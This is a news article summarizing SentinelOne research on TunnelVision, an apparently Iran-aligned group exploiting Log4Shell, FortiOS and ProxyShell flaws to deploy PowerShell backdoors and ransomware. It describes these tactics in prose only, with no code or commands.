A “potentially destructive actor” aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability to infect unpatched VMware Horizon servers with ransomware.
Cybersecurity firm SentinelOne dubbed the group “TunnelVision” owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker Phosphorus as well as Charming Kitten and Nemesis Kitten.
“TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions,” SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report, with the intrusions detected in the Middle East and the U.S.
Also observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw (CVE-2018-13379) and the Microsoft Exchange ProxyShell vulnerability to gain initial access into the target networks for post-exploitation.
The researchers stated that
“TunnelVision attackers had been exploiting this vulnerability to execute malicious PowerShell commands and deploy backdoors. They also created backdoor users, harvested credentials, and performed lateral movement.”
PowerShell commands can be used to launch tools such as Ngrok, and to run additional commands using reverse shells. These shells are used to drop a PowerShell Backdoor which is capable of gathering credentials or executing reconnaissance commands.
SentinelOne said that it also found similarities in the process used to perform the reverse webshell with another PowerShell-based Implant called PowerLess, which was revealed by Cybereason researchers this month.
All through the activity, the threat actor is said to have utilized a GitHub repository known as “VmWareHorizon” under the username “protections20” to host the malicious payloads.
The cybersecurity firm stated that it associates the attacks with a distinct Iranian group not because they’re unrelated but due to “insufficient data to treat these as identical to any other attributions.” “